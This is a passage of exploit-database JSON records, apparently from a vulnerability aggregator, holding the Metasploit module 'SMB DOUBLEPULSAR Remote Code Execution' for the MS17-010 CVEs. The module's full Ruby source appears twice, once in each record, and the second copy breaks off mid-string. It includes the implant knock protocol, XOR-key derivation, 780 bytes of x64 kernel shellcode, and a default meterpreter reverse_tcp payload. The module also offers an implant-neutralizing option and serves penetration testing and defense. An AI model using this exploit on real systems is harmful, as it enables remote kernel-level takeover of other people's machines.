"SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:24:02", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "d0a2939c371f782cf16317767a0c287b", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T22:14:19", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow 